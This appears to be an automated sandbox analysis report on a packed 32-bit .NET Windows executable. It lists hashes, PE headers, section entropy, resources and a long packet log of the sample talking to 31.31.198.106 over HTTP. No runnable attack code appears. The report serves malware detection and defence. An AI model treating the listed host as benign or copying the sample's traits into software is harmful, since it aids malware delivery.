SHA1:	84051af6ed4aec8f1209d5f7ead77f20b8bffc2b
SHA256:	94ad0e1f81c61142471ffd1cbc66caf209d43aa514702033728a51e672702d6c
SHA512:	2ed1d7b4acdae4af17d96eb55a631b5965e011e326777698a9e598657a0ebac7a6769f05e73fdfe34e7f54967f89e83f148c3c8786018e8a6313ccac422a8927
SSDEEP:	12288:gxgyzi8LkpEaXE69uKAq5swzUfUUuAmwopvJMEe2l0BwnAwbPysHIC62MvNZS:cT2jEmD9uKb5sFDuiX9GjnAqqz0
TLSH:	F9E42308B795497BE729A2BC1CB60256033B3511BA59E3A83CDD72CE0AF2F51035E677
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....yMf..............0.................. ........@.. ....................... ............@................................

File Icon


Icon Hash:	c04e363636261032

Static PE Info

General

Entrypoint:	0x4ac806
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x664D79BC [Wed May 22 04:51:08 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xac7b4	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xae000	0xe68	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xaa80c	0xaaa00	17d26dbb8d69d9dddf251bdb208b4f71	False	0.9728708791208791	data	7.978446114894073	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xae000	0xe68	0x1000	be9486e84abbcfae210e89b9472532b7	False	0.647705078125	data	5.904562929176766	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb0000	0xc	0x200	a43eaef39b3b12fcf841d402d5c4826a	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xae100	0x7f0	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9281496062992126
RT_GROUP_ICON	0xae900	0x14	data	1.05
RT_VERSION	0xae924	0x344	data	0.43301435406698563
RT_MANIFEST	0xaec78	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 27, 2024 12:20:13.494515896 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:13.499495029 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:13.499567986 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:13.502289057 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:13.507262945 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.204536915 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.204610109 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.204643965 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.204663038 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.204678059 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.204766989 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.204778910 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.204802990 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.204848051 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.204930067 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.204998016 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.205029964 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.205043077 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.205260038 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.205310106 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.209728956 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.209783077 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.209835052 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.209849119 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.209870100 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.209950924 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.328521967 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.328572989 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.328629017 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.328656912 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.328664064 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.328697920 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.328708887 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.328756094 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.328804016 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.328955889 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.329010963 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.329044104 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.329056978 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.329078913 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.329113960 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.329129934 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.329709053 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.329741955 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.329761028 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.329797029 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.329813004 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.330102921 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.330137014 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.330177069 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.330178976 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.330190897 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.330226898 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.330229998 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.330809116 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.330840111 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.330856085 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.331063986 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.331114054 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.331120014 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.331154108 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.331193924 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.333751917 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.333806038 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.333839893 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.333849907 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.333874941 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.333919048 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.451189995 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.451236010 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.451275110 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.451284885 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.451312065 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.451349974 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.451381922 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.451396942 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.451426029 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.451652050 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.451816082 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.451858044 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.451951027 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.452044964 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.452079058 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.452090025 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.452114105 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.452155113 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.452357054 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.452411890 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.452445984 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.452461004 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.453346968 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.453392029 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.453401089 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.453437090 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.453479052 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.453486919 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.453521967 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.453557014 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.453563929 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.453589916 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.453632116 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.453635931 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.453682899 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.453716040 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.453726053 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.453768969 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.453799009 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.453813076 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.454042912 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.454087019 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.454093933 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.454128027 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.454169989 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.454421997 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.454474926 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.454523087 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.454524994 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.454721928 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.454767942 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.454775095 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.454809904 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.454852104 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.455209017 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.455245018 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.455279112 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.455285072 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.455552101 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.455598116 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.455605030 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.455637932 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.455677986 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.456326962 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.456396103 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.456429005 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.456439972 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.456464052 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.456499100 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.456501961 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.456532955 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.456573963 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.456691980 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.456724882 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.456758022 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.456768036 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.456957102 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.456990004 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.457000971 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.457024097 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.457066059 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.457930088 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.457983017 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.458028078 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.458033085 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.458066940 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.458101034 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.458107948 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.574038029 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.574129105 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.574131966 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.574187994 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.574229956 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.574242115 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.574279070 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.574312925 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.574347019 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.574363947 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.574381113 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.574388027 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.574435949 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.574469090 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.574474096 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.574537992 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.574577093 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.574836969 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.574872017 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.574904919 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.574909925 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.575117111 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.575151920 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.575159073 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.575186014 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.575225115 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.575426102 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.575515032 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.575546980 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.575555086 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.575582027 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.575627089 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.575891972 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.575927019 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.575958967 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.575967073 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.576185942 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.576226950 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.576241016 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.576273918 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.576309919 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.576471090 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.576502085 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.576535940 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.576545000 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.576569080 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.576603889 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.576822042 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.576857090 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.576905966 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.576914072 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.577114105 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.577155113 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.577167988 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.577198982 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.577231884 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.577244997 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.577474117 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.577522993 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.577527046 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.577564001 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.577601910 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.577856064 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.577889919 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.577924013 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.577929974 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.578275919 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.578320026 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.578329086 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.578362942 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.578408957 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.578845978 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.578866959 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.578880072 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.578898907 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.579523087 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.579546928 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.579561949 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.579562902 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.579602957 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.579643965 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.579660892 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.579678059 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.579691887 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.579693079 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.579715014 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.579725027 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.579811096 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.579850912 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.579981089 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.580245018 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.580255985 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.580267906 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.580280066 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.580292940 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.580319881 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.580387115 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.580420971 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.580431938 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.580432892 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.580471039 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.580471039 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.580720901 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.580732107 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.580750942 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.580760002 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.580765009 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.580796003 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.581295967 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.581317902 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.581329107 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.581341028 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.581372023 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.581545115 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.581554890 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.581569910 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.581581116 CEST	80	49722	31.31.198.106	192.168.2.12
